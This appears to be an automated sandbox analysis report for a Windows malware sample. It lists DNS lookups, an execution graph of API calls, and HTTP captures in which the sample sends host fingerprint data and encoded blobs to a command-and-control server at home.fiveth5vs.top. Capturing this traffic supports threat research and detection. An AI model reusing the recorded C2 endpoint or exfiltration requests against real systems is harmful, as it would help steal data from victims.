                                Dec 31, 2024 09:51:10.117393970 CET1.1.1.1192.168.2.100xcdb9No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:13.263524055 CET1.1.1.1192.168.2.100xcfbdNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:19.295010090 CET1.1.1.1192.168.2.100x255fNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                                Dec 31, 2024 09:51:20.470405102 CET1.1.1.1192.168.2.100x2f7cNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • httpbin.org
                                • home.fiveth5vs.top

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.1049719176.53.146.223808044C:\Users\user\Desktop\JbN2WYseAr.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:51:13.272392035 CET12360OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 442563
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 34 31 31 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627434110", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 31, 2024 09:51:13.277328968 CET2472OUTData Raw: 72 48 70 76 38 41 77 53 6c 2b 49 65 71 61 66 6f 32 70 57 76 78 42 74 62 6d 31 31 76 54 4e 4d 31 4f 32 6d 73 76 42 74 39 64 77 52 4a 71 64 70 46 64 52 51 33 45 71 36 36 67 74 35 55 38 30 51 4d 5a 31 68 56 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42
                                Data Ascii: rHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt5U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14R
                                Dec 31, 2024 09:51:13.277369976 CET2472OUTData Raw: 44 62 35 5c 2f 6f 69 48 79 39 75 5c 2f 77 43 52 39 76 6d 5c 2f 38 74 42 2b 48 31 36 30 7a 35 5c 2f 6c 66 5c 2f 58 4f 66 39 62 5c 2f 41 4a 5c 2f 7a 32 71 58 6e 4f 5c 2f 38 41 65 66 35 35 2b 31 66 31 5c 2f 77 44 72 30 32 53 4d 5c 2f 4a 38 2b 48 48
                                Data Ascii: Db5\/oiHy9u\/wCR9vm\/8tB+H160z5\/lf\/XOf9b\/AJ\/z2qXnO\/8Aef55+1f1\/wDr02SM\/J8+HH+fzqJ7fP8ARm9Pr8v1IfM3Ns\/jP\/PM\/wCuz\/n196hqZt8hePtJ9f3P06\/57c0zrv8Akk3\/APPOP05\/znisjop9fl+pWOzzHcf9s5Ixz7\/5+n0psW+Tyf4E\/wCmfH+c\/wCeKlbMm9P\/ACH\/AI\/X\/
                                Dec 31, 2024 09:51:13.277395964 CET4944OUTData Raw: 5a 5c 2f 6a 52 35 49 58 6c 5c 2f 65 2b 5a 5c 2f 71 49 42 6e 2b 66 66 69 6e 74 4a 38 7a 4a 39 2b 4f 50 39 31 5c 2f 71 75 4f 5c 2f 38 41 70 57 66 53 6e 79 52 75 75 7a 59 6e 38 5c 2f 74 48 31 37 65 33 5c 2f 77 42 63 31 6d 61 48 37 6b 50 39 34 5c 2f
                                Data Ascii: Z\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8\/tH17e3\/wBc1maH7kP94\/h\/IU2nv1\/D+pplcXI\/L+vkf5Pn66fsQeI7uf4L6joy3DNaaf4v1fT7vTJ9tzp97bTWul6tGt\/plyZ7G9tnm1C5UQ3Vs8DskuYmO9399174W\/DTxL5kl74WXRL6Te7al4Nul0BpJW4j87RpbbUvDKWsXU22k6
                                Dec 31, 2024 09:51:13.277470112 CET2472OUTData Raw: 5c 2f 31 6e 2b 66 30 36 5c 2f 7a 6f 4f 76 6e 66 6c 5c 2f 58 7a 4b 5c 2f 4f 64 2b 7a 5c 2f 74 6e 6a 39 78 5c 2f 77 44 71 5c 2f 77 41 35 7a 55 48 79 66 50 38 41 36 7a 76 39 50 38 5c 2f 30 78 32 7a 56 7a 79 63 5c 2f 36 77 68 76 35 66 70 56 61 53 50
                                Data Ascii: \/1n+f06\/zoOvnfl\/XzK\/Od+z\/tnj9x\/wDq\/wA5zUHyfP8A6zv9P8\/0x2zVzyc\/6whv5fpVaSP72\/7\/AB6f5+uKDUh9ET\/ln\/qv8\/8A6vbimAO33U8w\/Uj9an2v\/uc\/6v8A5b9PbPWoPLf5P48f5H6fT9c0HQHlp\/Gkaf8ALXuJ+lU2X5v9j\/pp+4t\/+3Tt1\/8Ar1c2\/u\/n\/OT+f5\/yx1FQ7Y\/
                                Dec 31, 2024 09:51:13.277483940 CET2472OUTData Raw: 6e 6c 5c 2f 38 38 76 4e 5c 2f 77 43 65 45 5c 2f 35 5c 2f 5c 2f 58 36 55 41 4d 38 76 7a 4a 45 66 37 5c 2f 37 33 5c 2f 6a 34 6a 50 72 30 75 76 7a 5c 2f 70 30 70 6e 7a 77 78 77 66 36 7a 5a 5c 2f 70 48 6c 65 58 5c 2f 31 39 66 6a 39 74 5c 2f 77 41 35
                                Data Ascii: nl\/88vN\/wCeE\/5\/\/X6UAM8vzJEf7\/73\/j4jPr0uvz\/p0pnzwxwf6zZ\/pHleX\/19fj9t\/wA57VJJsjkm+SNE8rn\/AD15ojkMex0TZ+68riL9\/j7V+P8A9fNAEfz+ZNMn3Lj\/AKZcfaB0\/wBE7fn3pjRv8iDP\/Lx52f8AP14+tPk37cfvH8z91FJH3H+fb9afH+8+4+9P9IlmMnP+fSg6CtJI6SInk70j\/wB
                                Dec 31, 2024 09:51:13.277524948 CET4944OUTData Raw: 55 77 32 79 6f 57 6a 63 47 4b 57 4e 39 79 4d 79 34 59 63 35 42 41 5c 2f 6f 6a 49 4d 78 6f 79 34 30 79 50 41 35 5a 54 72 79 77 4f 4a 38 56 38 50 6d 66 31 36 72 7a 78 6c 6a 4d 75 65 63 55 34 35 50 47 64 43 56 43 6c 4c 44 2b 7a 68 57 72 34 69 70 4b
                                Data Ascii: Uw2yoWjcGKWN9yMy4Yc5BA\/ojIMxoy40yPA5ZTrywOJ8V8Pmf16rzxljMuecU45PGdCVClLD+zhWr4ipKT\/wBoljcPF0qLw0XV+Z4ry6vDw+4kx2ZVKEcfhvCTNMs+o0+SUcJmCyLFyziUa8K1VV1UqUKGHpxgv3EcHiJKrWWJkqX8YWD\/AHf\/AEL\/ABptWKZl\/Qf5\/Gv93T\/mt9p5fj\/wCLZ\/s\/8Ajv8A9aipvn
                                Dec 31, 2024 09:51:13.277545929 CET2472OUTData Raw: 38 41 6e 33 48 66 5c 2f 77 44 56 32 72 54 32 6e 6c 2b 50 5c 2f 41 41 62 4a 6a 79 39 2b 2b 52 33 38 33 5c 2f 56 79 53 5c 2f 75 4f 6e 50 5c 2f 41 4e 63 65 76 36 6f 66 4c 38 7a 2b 5c 2f 77 44 39 73 76 38 41 55 38 66 35 5c 2f 4d 30 39 66 39 79 54 33
                                Data Ascii: 8An3Hf\/wDV2rT2nl+P\/AAbJjy9++R383\/VyS\/uOnP\/ANcev6ofL8z+\/wD9sv8AU8f5\/M09f9yT38z9x\/ng+3NHyyNM7pvfzf3X+e3+eBWZ0DPLdfO\/vx\/9Mv1\/rRI0yyJD\/B\/z8f1wKEj3b9jl\/wDtr7frnNN2\/MjpDgf6qXzP8\/lWntPL8f8AgAQx\/vJPL2RzJH9ol80\/uPO7\/wCOafJn93v+5\/n\/
                                Dec 31, 2024 09:51:13.277558088 CET2472OUTData Raw: 76 52 70 4e 51 6c 6b 74 4f 57 62 30 57 30 76 72 47 57 75 47 4e 77 5c 2f 74 63 50 56 70 56 4a 5c 2f 74 47 4d 2b 6a 6e 34 34 35 66 46 7a 78 58 68 70 78 4c 43 43 72 35 66 68 6e 4f 6e 51 77 32 49 69 71 2b 5a 35 6d 38 6c 77 64 4b 2b 47 78 56 5a 4f 70
                                Data Ascii: vRpNQlktOWb0W0vrGWuGNw\/tcPVpVJ\/tGM+jn445fFzxXhpxLCCr5fhnOnQw2Iiq+Z5m8lwdK+GxVZOpUzeM8snFO+HxtOrhsT7GrSqRj9W\/s4ftT\/ABH\/AGb9eNx4duTrPg\/UrmOTxJ4G1K4lGkaoMLG97YuBI2ja4kKqkGq2sbeZ5cEWo22oWkKWw978Of8ABTP9o7wj418Ranb63YeOvAd54r1\/V\/DPgz4laZHrF
                                Dec 31, 2024 09:51:13.282229900 CET4944OUTData Raw: 72 38 47 59 74 35 6e 54 7a 33 4b 38 46 56 77 75 46 34 56 72 5a 6c 6b 75 4d 78 57 4c 78 6b 73 64 69 63 50 68 63 76 64 48 47 59 62 4b 71 6c 57 57 4a 78 46 44 45 59 65 68 50 6e 71 30 34 34 65 70 4f 5a 2b 2b 58 5c 2f 44 39 63 5c 2f 39 47 73 6a 5c 2f
                                Data Ascii: r8GYt5nTz3K8FVwuF4VrZlkuMxWLxksdicPhcvdHGYbKqlWWJxFDEYehPnq044epOZ++X\/D9c\/9Gsj\/AMPh\/wDigo\/4frn\/AKNZH\/h8P\/xQV+AF9bNY\/CnUvjS+qeFLzwDpvxLm+G\/2zTtcvV1fUY4DBbP8QdM8P6zoei6ofhwdbv8AR\/DA1zU7fStTTxLrWn6PcaHBdLfrYt1BvDGh+Fo9e8W\/F34L\/D3xBqv
                                Dec 31, 2024 09:51:13.282247066 CET2472OUTData Raw: 45 39 5c 2f 79 5c 2f 4d 30 79 50 38 41 64 37 58 2b 2b 5c 2f 35 65 54 2b 58 2b 66 70 55 38 66 37 73 62 30 2b 52 5c 2f 2b 57 58 62 5c 2f 50 54 76 36 56 44 35 62 5c 2f 4f 5c 2f 50 2b 54 39 50 31 50 35 38 55 41 52 78 37 31 32 5a 54 5a 35 6e 37 72 39
                                Data Ascii: E9\/y\/M0yP8Ad7X++\/5eT+X+fpU8f7sb0+R\/+WXb\/PTv6VD5b\/O\/P+T9P1P58UARx712ZTZ5n7r95\/h\/h+tQsyRSf8tP+eXfyPs\/9c\/zqy0n8aGN3kz+7k\/z6f57FkcbxxuPv95eKDoIflTZv8vZ\/wA8\/wCX\/wBel\/eeW6bP+WX72Tzf\/JX\/AD9aSNfubF2OZc+XJx\/k0L8y7N8f\/TLzOv6j\/jxrT2n
                                Dec 31, 2024 09:51:18.070982933 CET138INHTTP/1.1 200 OK
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:17 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1
                                Data Raw: 30
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.1049760176.53.146.223808044C:\Users\user\Desktop\JbN2WYseAr.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:51:19.301450968 CET98OUTGET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Dec 31, 2024 09:51:20.142997980 CET353INHTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:19 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.1049766176.53.146.223808044C:\Users\user\Desktop\JbN2WYseAr.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 09:51:20.476593018 CET171OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 31, 2024 09:51:21.518542051 CET353INHTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.104970334.200.57.1144438044C:\Users\user\Desktop\JbN2WYseAr.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 08:51:10 UTC52OUTGET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-31 08:51:10 UTC224INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 08:51:10 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-31 08:51:10 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:03:51:07
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\JbN2WYseAr.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\JbN2WYseAr.exe"
                                Imagebase:0x420000
                                File size:4'512'256 bytes
                                MD5 hash:3168CDB0691E91FC0109D3D5E854B7B1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.8%
                                  Total number of Nodes:245
                                  Total number of Limit Nodes:36
                                  execution_graph 60187 43d5e0 60188 43d652 WSAStartup 60187->60188 60189 43d5f0 60187->60189 60188->60189 60024 45b400 60025 45b425 60024->60025 60026 45b40b 60024->60026 60029 427770 60026->60029 60027 45b421 60030 427790 60029->60030 60031 4277b6 recv 60029->60031 60030->60031 60032 427799 60030->60032 60031->60032 60032->60027 60033 45e400 60034 45e412 60033->60034 60036 45e459 60033->60036 60037 4568b0 closesocket 60034->60037 60037->60036 60038 45b3c0 60039 45b3ee 60038->60039 60040 45b3cb 60038->60040 60044 4276a0 60040->60044 60048 459290 60040->60048 60041 45b3ea 60045 4276c0 60044->60045 60046 4276e6 send 60044->60046 60045->60046 60047 4276c9 60045->60047 60046->60047 60047->60041 60049 4276a0 send 60048->60049 60050 4592e5 60049->60050 60051 459335 WSAIoctl 60050->60051 60054 459392 60050->60054 60052 459366 60051->60052 60051->60054 60053 459371 setsockopt 60052->60053 60052->60054 60053->60054 60054->60041 60055 4213c9 60058 421160 60055->60058 60057 4213a1 60058->60057 60059 7a8a20 _open isxdigit 60058->60059 60059->60058 60190 4d4720 60194 4d4728 60190->60194 60191 4d4733 60193 4d4774 60194->60191 60199 4d476c 60194->60199 60200 4d9270 60194->60200 60196 4d4860 60203 4d4950 60196->60203 60198 4d4878 60199->60198 60207 4d30a0 closesocket 60199->60207 60208 4da440 60200->60208 60202 4d9297 60202->60196 60206 4d4966 60203->60206 60204 4d49c5 60204->60199 60205 4d4aa0 gethostname 60205->60204 60205->60206 60206->60204 60206->60205 60207->60193 60209 4da46b 60208->60209 60211 4da48b GetAdaptersAddresses 60209->60211 60240 4da4db 60209->60240 60210 4daa03 RegOpenKeyExA 60212 4daa27 RegQueryValueExA 60210->60212 60213 4dab70 RegOpenKeyExA 60210->60213 60225 4da4a6 60211->60225 60211->60240 60214 4daacc RegQueryValueExA 60212->60214 60215 4daa71 60212->60215 60216 4dac34 RegOpenKeyExA 60213->60216 60237 4dab90 60213->60237 60218 4dab0e 60214->60218 60219 4dab66 RegCloseKey 60214->60219 60215->60214 60224 4daa85 RegQueryValueExA 60215->60224 60217 4dacf8 RegOpenKeyExA 60216->60217 60239 4dac54 60216->60239 60220 4dad56 RegEnumKeyExA 60217->60220 60227 4dad14 60217->60227 60218->60219 60226 4dab1e RegQueryValueExA 60218->60226 60219->60213 60223 4dad9b 60220->60223 60220->60227 60221 4da4f3 GetAdaptersAddresses 60222 4da505 60221->60222 60221->60240 60232 4da527 GetAdaptersAddresses 60222->60232 60222->60240 60228 4dae16 RegOpenKeyExA 60223->60228 60229 4daab3 60224->60229 60225->60221 60225->60240 60235 4dab4c 60226->60235 60227->60202 60230 4daddf RegEnumKeyExA 60228->60230 60231 4dae34 RegQueryValueExA 60228->60231 60229->60214 60230->60227 60230->60228 60233 4daf43 RegQueryValueExA 60231->60233 60241 4dadaa 60231->60241 60232->60240 60234 4db052 RegQueryValueExA 60233->60234 60233->60241 60236 4dadc7 RegCloseKey 60234->60236 60234->60241 60235->60219 60236->60230 60237->60216 60238 4dafa0 RegQueryValueExA 60238->60241 60239->60217 60240->60210 60240->60227 60241->60233 60241->60234 60241->60236 60241->60238 60242 4d70a0 60245 4d70ae 60242->60245 60244 4d71a7 60245->60244 60246 4d717f 60245->60246 60249 4ea8c0 60245->60249 60253 4d71c0 socket ioctlsocket connect getsockname 60245->60253 60246->60244 60254 4e9320 closesocket 60246->60254 60250 4ea8e6 60249->60250 60251 4ea903 recvfrom 60249->60251 60250->60251 60252 4ea8ed 60250->60252 60251->60252 60252->60245 60253->60245 60254->60244 60060 4ea080 60063 4e9740 60060->60063 60062 4ea09b 60064 4e9780 60063->60064 60068 4e975d 60063->60068 60065 4e9925 RegOpenKeyExA 60064->60065 60064->60068 60066 4e995a RegQueryValueExA 60065->60066 60065->60068 60067 4e9986 RegCloseKey 60066->60067 60067->60068 60068->60062 60069 4eb180 60072 4eb19b 60069->60072 60076 4eb2e3 60069->60076 60073 4eb2a9 getsockname 60072->60073 60075 4eb020 closesocket 60072->60075 60072->60076 60077 4eaf30 60072->60077 60081 4eb060 60072->60081 60086 4eb020 60073->60086 60075->60072 60078 4eaf4c 60077->60078 60079 4eaf63 socket 60077->60079 60078->60079 60080 4eaf52 60078->60080 60079->60072 60080->60072 60082 4eb080 60081->60082 60083 4eb0b0 connect 60082->60083 60084 4eb0bf WSAGetLastError 60082->60084 60085 4eb0ea 60082->60085 60083->60084 60084->60082 60084->60085 60085->60072 60087 4eb029 60086->60087 60088 4eb052 60086->60088 60089 4eb04b closesocket 60087->60089 60090 4eb03e 60087->60090 60088->60072 60089->60088 60090->60072 60255 4ea920 60256 4ea944 60255->60256 60257 4ea94b 60256->60257 60258 4ea977 send 60256->60258 60091 458b50 60092 458b6b 60091->60092 60110 458bb5 60091->60110 60093 458bf3 60092->60093 60094 458b8f 60092->60094 60092->60110 60111 45a550 60093->60111 60130 436e40 select 60094->60130 60097 458bfc 60100 458c35 60097->60100 60101 458c1f connect 60097->60101 60102 458cb2 60097->60102 60097->60110 60098 458ba1 60099 458cd9 SleepEx 60098->60099 60098->60102 60098->60110 60106 458d14 60099->60106 60126 45a150 60100->60126 60101->60100 60103 45a150 getsockname 60102->60103 60108 458dff 60102->60108 60102->60110 60103->60108 60106->60102 60107 458d43 60106->60107 60109 45a150 getsockname 60107->60109 60108->60110 60131 4278b0 closesocket 60108->60131 60109->60110 60112 45a575 60111->60112 60115 45a597 60112->60115 60133 4275e0 60112->60133 60114 4278b0 closesocket 60117 45a713 60114->60117 60116 45a811 setsockopt 60115->60116 60118 45a69b 60115->60118 60123 45a83b 60115->60123 60116->60123 60117->60097 60118->60114 60118->60117 60120 45af56 60120->60118 60121 45af5d 60120->60121 60121->60117 60122 45a150 getsockname 60121->60122 60122->60117 60123->60118 60125 45abe1 60123->60125 60139 456be0 select closesocket 60123->60139 60125->60118 60138 4867e0 ioctlsocket 60125->60138 60127 45a15f 60126->60127 60129 45a1d0 60126->60129 60128 45a181 getsockname 60127->60128 60127->60129 60128->60129 60129->60098 60130->60098 60132 4278c5 60131->60132 60132->60110 60134 427607 socket 60133->60134 60136 4275ef 60133->60136 60135 42762b 60134->60135 60135->60115 60136->60134 60137 427643 60136->60137 60137->60115 60138->60120 60139->60125 60140 422f17 60142 422f2c 60140->60142 60141 4231d3 60142->60141 60143 422fb3 RegOpenKeyExA 60142->60143 60144 42315c RegEnumKeyExA 60142->60144 60145 423046 RegOpenKeyExA 60142->60145 60147 42313b RegCloseKey 60142->60147 60143->60142 60144->60142 60145->60142 60146 423089 RegQueryValueExA 60145->60146 60146->60142 60146->60147 60147->60142 60148 4231d7 60149 4231f4 60148->60149 60150 423200 60149->60150 60151 4232dc CloseHandle 60149->60151 60151->60150 60259 4595b0 60260 4595c8 60259->60260 60262 4595fd 60259->60262 60261 45a150 getsockname 60260->60261 60260->60262 60261->60262 60152 423d5e 60153 423d30 60152->60153 60153->60152 60155 423d90 60153->60155 60156 430ab0 60153->60156 60159 4305b0 60156->60159 60158 430acd 60158->60153 60163 4305bd 60159->60163 60166 4307c7 60159->60166 60160 430707 WSAEventSelect 60160->60163 60160->60166 60161 4307ef 60162 430847 60161->60162 60161->60166 60169 436fa0 60161->60169 60162->60166 60167 4309e8 WSAEnumNetworkEvents 60162->60167 60168 4309d0 WSAEventSelect 60162->60168 60163->60160 60163->60161 60165 4276a0 send 60163->60165 60163->60166 60165->60163 60166->60158 60167->60162 60167->60168 60168->60162 60168->60167 60170 436fd4 60169->60170 60172 436feb 60169->60172 60171 437207 select 60170->60171 60170->60172 60171->60172 60172->60162 60263 4229ff FindFirstFileA 60264 422a31 60263->60264 60265 422a5c RegOpenKeyExA 60264->60265 60266 422a93 60265->60266 60267 422ade CharUpperA 60266->60267 60268 422b0a 60267->60268 60269 422bf9 QueryFullProcessImageNameA 60268->60269 60270 422c3b CloseHandle 60269->60270 60271 422c64 60270->60271 60272 422df1 CloseHandle 60271->60272 60273 422e23 60272->60273 60274 8d4370 60275 8d439a 60274->60275 60276 8d43a6 60275->60276 60284 7a8f70 60275->60284 60281 8d43e6 60282 7a8f70 _open 60283 8d43ef 60282->60283 60295 7a8e90 _open 60284->60295 60286 7a8f82 60287 7a8e90 _open 60286->60287 60288 7a8fa2 60287->60288 60289 7a8f70 _open 60288->60289 60290 7a8fb8 60289->60290 60291 7b12c0 60290->60291 60292 7b12cc 60291->60292 60297 7ae050 60292->60297 60294 7b12fa 60294->60281 60294->60282 60296 7a8eba 60295->60296 60296->60286 60298 7ae09d 60297->60298 60299 7afeb6 isxdigit 60298->60299 60300 7ae18e 60298->60300 60299->60298 60300->60294 60173 42255d 60174 7a9f70 60173->60174 60175 42256c GetSystemInfo 60174->60175 60176 422589 60175->60176 60177 4225a0 GlobalMemoryStatusEx 60176->60177 60182 4225ec 60177->60182 60178 422762 60181 4227d6 KiUserCallbackDispatcher 60178->60181 60179 42263c GetDriveTypeA 60180 422655 GetDiskFreeSpaceExA 60179->60180 60179->60182 60180->60182 60183 4227f8 60181->60183 60182->60178 60182->60179 60184 4228d9 FindFirstFileW 60183->60184 60185 422906 FindNextFileW 60184->60185 60186 422928 60184->60186 60185->60185 60185->60186

                                  Executed Functions

                                  Function 0045F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
